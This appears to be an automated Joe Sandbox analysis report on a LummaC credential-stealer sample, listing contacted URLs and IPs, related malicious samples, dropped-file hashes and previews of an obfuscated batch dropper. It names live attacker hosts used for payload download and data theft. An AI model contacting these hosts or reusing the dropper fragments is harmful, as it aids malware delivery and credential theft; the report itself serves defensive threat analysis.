https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Fires.com, 0000000C.00000003.2147298829.00000000048B6000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135626746.00000000048BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/autoit3/	Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Retrieved.8.dr, Fires.com.1.dr	false		high
https://cegu.shop/8574262446/ph.txteK	Fires.com, 0000000C.00000002.2223065322.0000000004784000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cegu.shop/8574262446/ph.txtM)	Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beattalkerz.cyou/api(	Fires.com, 0000000C.00000002.2222110347.00000000017FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://klipvumisui.shop/int_clp_sha.txtp	Fires.com, 0000000C.00000002.2222110347.00000000017B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Fires.com, 0000000C.00000003.2147298829.0000000004891000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000011.00000002.2234343344.0000000005BF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000011.00000002.2234343344.0000000005BF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beattalkerz.cyou:443/api9%107%112%118%113%107%113%105%118%53%111%122%105%118%124%123%53%118%	Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dfgh.online	powershell.exe, 00000011.00000002.2231978017.0000000004F11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beattalkerz.cyou/api)	Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://beattalkerz.cyou/apibu	Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dfgh.online/invoker.php?compname=	powershell.exe, 00000011.00000002.2231598557.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Fires.com, 0000000C.00000003.2160347749.0000000005837000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000011.00000002.2231978017.0000000004B91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipvumisui.shop/int_clp_sha.txt~	Fires.com, 0000000C.00000002.2222110347.00000000017B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://klipvumisui.shop/int_clp_sha.txtQD	Fires.com, 0000000C.00000002.2223295221.0000000004868000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://klipvumisui.shop/int_clp_sha.txt	Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000011.00000002.2234343344.0000000005BF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipvumisui.shop/Bp	Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.2231978017.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.2231978017.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000011.00000002.2231978017.00000000053FF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000011.00000002.2234343344.0000000005BF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Fires.com, 0000000C.00000000.1715369198.0000000000E15000.00000002.00000001.01000000.00000007.sdmp, Fires.com, 0000000C.00000003.2112044034.0000000004CD7000.00000004.00000800.00020000.00000000.sdmp, Pioneer.8.dr, Fires.com.1.dr	false		high
https://klipvumisui.shop/int_clp_sha.txtX	Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Fires.com, 0000000C.00000003.2147298829.00000000048B6000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135626746.00000000048BD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	'Set-up.exe	false		high
https://beattalkerz.cyou/gf06r/rqanYKzRPHTmgGhjuyoc	Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Fires.com, 0000000C.00000003.2160347749.0000000005837000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.2231978017.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipvumisui.shop/	Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compName=user-PC	powershell.exe, 00000011.00000002.2231978017.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2231978017.0000000004F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2235605610.00000000072E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.microsof	Fires.com, 0000000C.00000003.2135626746.00000000048BF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Fires.com, 0000000C.00000003.2159386083.000000000489B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Fires.com, 0000000C.00000003.2147298829.0000000004891000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beattalkerz.cyou:443/apin.txtPK	Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://beattalkerz.cyou/p	Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lBtq	powershell.exe, 00000011.00000002.2231978017.0000000004B91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://beattalkerz.cyou/	Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Fires.com, 0000000C.00000003.2135462785.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134542006.0000000004879000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135144110.000000000487A000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2134410042.0000000004890000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.161.251.21	cegu.shop	United Kingdom		5089	NTLGB	false
104.21.25.52	beattalkerz.cyou	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585352
Start date and time:	2025-01-07 14:50:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	'Set-up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@29/26@5/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 85 Number of non-executed functions: 295
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.253.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 928 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 'Set-up.exe

Simulations

Behavior and APIs

Time	Type	Description
08:51:02	API Interceptor	1x Sleep call for process: 'Set-up.exe modified
08:51:06	API Interceptor	18x Sleep call for process: Fires.com modified
08:51:57	API Interceptor	5x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
185.161.251.21	SET_UP.exe	Get hash	malicious	LummaC	Browse
	Set-UpFile_v25.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.8.exe	Get hash	malicious	LummaC	Browse
	setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.7.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Set-up.exe	Get hash	malicious	LummaC	Browse
104.21.25.52	Set-UpFile_v25.exe	Get hash	malicious	LummaC	Browse
104.21.25.52	https://ness.wiktripfitness.com/ghjki9l-8765t4/3/er4t5y6u7jyhtgrfefrgthyjuyhtgdsarfedwsqa	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	SET_UP.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Set-UpFile_v25.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	installer_1.05_36.8.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	installer_1.05_36.7.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Set-up.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
beattalkerz.cyou	Set-UpFile_v25.exe	Get hash	malicious	LummaC	Browse	104.21.25.52

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTLGB	SET_UP.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Set-UpFile_v25.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	ppc.elf	Get hash	malicious	Mirai	Browse	86.15.78.37
	installer_1.05_36.8.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyql	Get hash	malicious	HTMLPhisher	Browse	194.168.231.153
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	installer_1.05_36.7.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
CLOUDFLARENETUS	SET_UP.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-UpFile_v25.exe	Get hash	malicious	LummaC	Browse	104.21.25.52
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	https://sos-ch-gva-2.exo.io/ready/seah/continue/complete-this-to-continue.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.17.25.14
	te13.exe	Get hash	malicious	Metasploit	Browse	104.21.16.1
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkM	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://check.qlkwr.com/awjsx.captcha?u=d9b43caa-60bc-4673-bed6-4e9abc0c0678	Get hash	malicious	Unknown	Browse	104.21.55.46
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	SET_UP.exe	Get hash	malicious	LummaC	Browse	185.161.251.21 104.21.25.52
	Set-UpFile_v25.exe	Get hash	malicious	LummaC	Browse	185.161.251.21 104.21.25.52
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21 104.21.25.52
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse	185.161.251.21 104.21.25.52
	64pOGv7k4N.exe	Get hash	malicious	LummaC	Browse	185.161.251.21 104.21.25.52
	BnJxmraqlk.exe	Get hash	malicious	LummaC, PrivateLoader	Browse	185.161.251.21 104.21.25.52
	NjFiIQNSid.exe	Get hash	malicious	LummaC	Browse	185.161.251.21 104.21.25.52
	H565rymIuO.doc	Get hash	malicious	Unknown	Browse	185.161.251.21 104.21.25.52
	w3245.exe	Get hash	malicious	Unknown	Browse	185.161.251.21 104.21.25.52
	w3245.exe	Get hash	malicious	Unknown	Browse	185.161.251.21 104.21.25.52

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Setup.exe	Get hash	malicious	LummaC	Browse
	RailProvides_nopump.exe	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	installer_1.05_36.8.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	DansMinistrie.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.7.exe	Get hash	malicious	LummaC Stealer	Browse
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse
	'Set-up.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\F

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	506548
Entropy (8bit):	7.9996354512693415
Encrypted:	true
SSDEEP:	12288:gEg1TODNvAPvlxsWnB+F5s/8WwD/TH1IJCVVmLKvG9dlv:eTqQvlehF5sVwD/WVLVdF
MD5:	62459D3E0A66A0BBDD155359B3688A04
SHA1:	6BB1F334A82E6536580D53CBB067EC9E0E273696
SHA-256:	A871851AF14905CFE2F7D5E3CD922F39CA17FF499280971B91725969AB38D2F3
SHA-512:	F62DBD6A86100B75EDF7045DC205AEC208A57A3206E8DA33BD9E5A4B3B782758CE97D251BC6512FB88C1B87210A711E023657A06C9434289B1AA4C3444C03E02
Malicious:	true
Preview:	..A4g\U..........N..x.]."f....9.G2.....w...^...d.V.."...a.....-...h../.I.{....GG%S%sR,$..C0.....C....u...f..k....I.6}.....E....L.A.!.o..}..<Q>KT..$.7T.j..V.......'cku..3@.o.~.W...?.....^.v..?.$.%bN..!.TY.R\c...{{.r.U.."...,.n..f.]....a............D..i.d.(k...../..d.YJ.....;.1.$!...ICg&9P.7{.w.i>_GX.5..I.(.....a....~!j2.I..Z.z.Ki.'..F.t>-C. _..c..=.%....tc~-.m....y}.+..~.j..;......>..Z....y....0B..!.n.V..(g.....u...".PU..cx.r.O.\|.#../?..G......t.< .a.d.V..un."O..kR........fq.E=...z....P).C/...)R.x<N..J.w..).q.....s..Y...ZHzS.8HJ...a....Ur.A.w.....\j..`..[..'9.8..s..5.>.[.}..6.3..K.'..(.E.9\...9.3jLc+Y.U.B.t.R..J..^q.....Y".t-.....x. ...Xz.U..3..#".7z.@42.g.#.y...=D.h...`cn.S\|.....V':8V..7.5e$a.,.[..F.q..[.x.m..M....hz...+.Iv.P...O.....f..<.i.[....O.?...,.. 3.....z.nl..Xd..c..b .}.4 .....?....R.)..'.K.W...;.z...f.Y..X~..S.......<23.Z......y.M._....Tu<.5..pX.v.m4......R..........)..[a.)#Y.N/.....@..."v.\\|...Qe.t.x.k`..s.v........`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Setup.exe, Detection: malicious, Browse Filename: RailProvides_nopump.exe, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: installer_1.05_36.8.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: DansMinistrie.exe, Detection: malicious, Browse Filename: installer_1.05_36.7.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: 'Set-up.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Believe

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	78848
Entropy (8bit):	6.067046843953039
Encrypted:	false
SSDEEP:	1536:IzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8anHsWk:IzW9FfTut/Dde6u640ewy4Za9coRC2jv
MD5:	12BB55787AD2EC6D66B703CE2144F7B4
SHA1:	C6C0D2EBA7B96251E20BF8F16BDA3222BFB4A39B
SHA-256:	0D4DCAD8DEE6E26A0B8DB05E178484E015FC67DB709467F391C131E253D478E4
SHA-512:	37D55925298736378263C50D4ECB6986574A60B51D56864E6481DAD4A7216263C66A5907CBDC204145B6BB34CB3DA3B7CA636EC4ABBBE2BF2458C153091E8267
Malicious:	false
Preview:	.Q..L2.8\2.t..I8..A..D2.8\2.t..@8.X.3.G....4.I.j..._.u.........~.3._..^[]...U..V.u.......j...........By...Q..\|2...L2.t..I8..A..\|2...D2.t..@8.@...u........&..F.............j.j.j..0....I........l...3.^]...U..V.u....9...j..........@y...Q..\|2...L2.t..I8..A..\|2...D2.t..@8.@...u...."....&..F.....3.^]...U....QSVW.}...W.....3..CS.".......y=...Q..\|2...L2.t..I8..A..\|2...D2.t..@8.@.............k%....t..u........&..^..g._..D$........v..G..H..n....D$....v..O..I..Z.............L$...M.......~..y.......j..0....I....,......u._^3.[..]...U...$SV.54.I.W........]...!...E.P....I...u>.u........3.3.B...V....H..D9.8\9.t..@8.P..D9.8\9.t..@8.X......E.PS....I...P.E.P.......3....E.)E.E..M.)E...[..3...j.GWV.Nb...M.E.3.M.SWPV.].}..$h......M..Y....E..E.3.@.].PP.E.E.PV..g......M..3....M.2...!.._^3.[....U.......SV.u........j....3.......L...I...Y..A...y...t..@8..P.....t..@8.@......y...A.t..@8.M.h..I..@....I...0.L$..z..........T$.........M..D$.P..X...L$..x...^3.[..]...U......$SVW.u....4....}...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Breasts

Download File

Process:	C:\Users\user\Desktop\'Set-up.exe
File Type:	ASCII text, with very long lines (923), with CRLF line terminators
Category:	dropped
Size (bytes):	23615
Entropy (8bit):	5.1295262711552585
Encrypted:	false
SSDEEP:	384:aId6K9dEiSAJIvM58uRM4qyBy+kyUkKIxTchORhQ76PdiB2xkJL35i9N/eJRDXL0:v/9dCAJt5m4qyBy+kyULOTchkQ74diJE
MD5:	97A351C5B2ADF2E62B7A3DA2F24A572F
SHA1:	2EC1FDEB95A813CF6B89EBB6C5B6120CF1EC7AF1
SHA-256:	814D89A6311D206AFA43133E06635ACD499FAAEE5CD810605637FF538DE356EE
SHA-512:	F4DEA36BF09C47CB0FFC5D93848378E13413FBB934A1B5B35AD46F3059CEC7834FC8180A7F1F66C57D6C471E7EEF9905677BDA79AE1F547F0EB830E14E95782F
Malicious:	false
Preview:	Set Isa=K..KnzMitsubishi-Providers-No-Ticket-Vertical-Fool-Rally-Mh-..bUfMention-Dating-Lions-Velocity-Certainly-Attack-To-..jXTrackbacks-Cathedral-Techniques-Albums-Foul-Belly-Bags-..UmaPresents-Utilize-Approx-..WnGMCon-Subaru-Strongly-..Set Mounts=c..DbCock-..oLiPersonally-Returns-Hook-Kingdom-Gba-Xx-Passengers-Indianapolis-Brad-..ZpfPotatoes-Convenient-Imports-Kentucky-Thousand-Replaced-Declare-Utah-Latitude-..UwxwAta-Folders-Holly-Johns-Toolkit-Livestock-..blpHCalibration-Strengthen-Urls-Tell-Want-Divx-..aYtSides-Gods-Quarters-Puzzles-Difficulty-Poland-Neck-..EGQDisplay-..KzzReporter-Defects-Ethics-Disease-Beef-Bother-Bell-Metro-Suggesting-..NRIIPrediction-Nuke-Beyond-Congo-Shield-Investigator-Sara-Null-Sizes-..efPolyester-Exercises-Dosage-Technologies-Compounds-Greatest-Crisis-Structure-..Set Closing=b..HYOlTide-Initiative-Nz-Diving-Sensitivity-Naked-Descriptions-Had-Verification-..JsniDrinking-Lists-Acne-Foundation-Thee-Pound-Gmt-..gkGStudent-Disciplines-Surgical-Ai-..fHEnemy-Ins

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Breasts.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (923), with CRLF line terminators
Category:	dropped
Size (bytes):	23615
Entropy (8bit):	5.1295262711552585
Encrypted:	false
SSDEEP:	384:aId6K9dEiSAJIvM58uRM4qyBy+kyUkKIxTchORhQ76PdiB2xkJL35i9N/eJRDXL0:v/9dCAJt5m4qyBy+kyULOTchkQ74diJE
MD5:	97A351C5B2ADF2E62B7A3DA2F24A572F
